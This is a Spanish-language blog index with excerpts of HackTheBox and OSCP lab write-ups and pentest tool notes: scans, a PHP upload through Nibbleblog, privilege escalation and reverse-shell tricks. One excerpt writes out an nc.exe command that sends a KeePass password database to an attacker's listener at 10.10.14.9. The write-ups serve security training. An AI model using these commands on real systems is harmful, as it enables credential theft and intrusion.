by Ric | Apr 24, 2021 | Blog, Herramientas / tools
La siguiente serie de posts serán un extracto del curso “Attacking Active Directory with Linux”. Al final de los posts haré un review del curso completo. Este es el escenario: Se asume que ya estamos dentro de la red. Primero un scan a toda la red: nmap...
by Ric | Oct 21, 2019 | Blog, Herramientas / tools, OSCP
Este ya lo había hecho pero usando metasploit. Una vez descubrimos la version de Nibbleblog podemos encontrar la vulnerabilidad en internet. En resumen, podemos subir imagenes sin filtros de tipo. Por lo que podemos subir un PHP sin problema. Lo que es más interesante...
by Ric | Oct 21, 2019 | Blog, OSCP
Esta fue una maquina interensante pero estuvo muy fácil y sin MSF 🙂 Empezamos con un nmap (sparta) Como solo había un webserver use dirbuster medium. Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / – 200 Dir found:...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Lo transferimos de windows a linux con: C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx Lo recibimos con root@Kali2:~/Downloads# nc -lp...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Esta ha sido una de mis maquinas favoritas. Aprendí mucho y estuvo muy interesante. Como siempre empezamos con un Nmap rápido root@Kali2:~/Downloads# nmap -sC -sV 10.10.10.51 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 16:12 CEST Nmap scan report for...
by Ric | Oct 11, 2019 | Blog, Herramientas / tools, OSCP
Algunas veces hay procesos automáticos que puedes modificar para lograr un priv-escalation. Por ejemplo en Solidstate de HackTheBox podemos ver que tenemos opcion de escribir en un archivo que es root pero no ejecutarlo. Tenemos la teoría que se ejecutar...
by Ric | Jan 24, 2019 | Blog, Herramientas / tools
Hoy me mandaron una página incredible de funciones de Linux y como pueden ser ( abused to get the f**k break out ) brincadas si hay alguna misconfiguracion para elevar tus privilegios o hacer reverse shells. Aquí 🙂 Algunos ejemplos de los que ya usamos en hack the...
by Ric | Jul 22, 2018 | Herramientas / tools
Checar todo lo que fue modificado x dias antes y x dias despues para saber que hizo un atacante find / -type f -newermt DOSDIASANTES ! -newermt DOSDIASDESPUES -ls 2>/dev/null roosa@gitter:~$ find / -type f -newermt 2018-03-25 ! -newermt 2018-03-27 -ls...
by Ric | May 31, 2018 | Blog
Mi primera live box hoy es 31/05/18, publicada el 2/feb porque se publicó el fin de semana. Por el nombre podemos asumir que se trata de nibbleblog Sparta te dice que solo hay 2 puertos 80 y 22 si vamos al 80 y vemos el codigo fuente podemos ver que nos manda al...
by Ric | May 30, 2018 | Blog, Herramientas / tools, OSCP
Está es mi primer box con dificultad media. 1 probe. Del nombre popcorn al principio no encontre nada pero despues de usar dirbuster con la lista chica (creo) sin recursive porque si no se hace eterno encontre una carpeta que se llama torrent. Supuse que necesitas...
by Ric | May 28, 2018 | Herramientas / tools
Linux escalation https://dirtycow.ninja/ son vulnerbles linux-image-4.8.0-26 (4.8.0-26.28) for Ubuntu 16.10 linux-image-4.4.0-45 (4.4.0-45.66) for Ubuntu 16.04 LTS linux-image-3.13.0-100 (3.13.0-100.147) for Ubuntu 14.04 LTS linux-image-3.2.0-113 (3.2.0-113.155) for...
by Ric | May 24, 2018 | Blog
Es un shell para correr en un usuario de linux que ya tengas y te va a dar mucha información. Scripted Local Linux Enumeration & Privilege Escalation Checks https://github.com/rebootuser/LinEnum 1,990 forks. 7,018 stars. 24 open issues. Recent commits: Update...
by Ric | May 22, 2018 | Blog
Ok, mi primera victima. Probe (Investigación) Un poco de investigación del nombre del box Puertos abiertos y servicios Penetrate Que exploits puedo usar y cuales funcionaron Persist (en este caso será escalation porque no persistiré nada…) Que aprendí Aquí tengo que...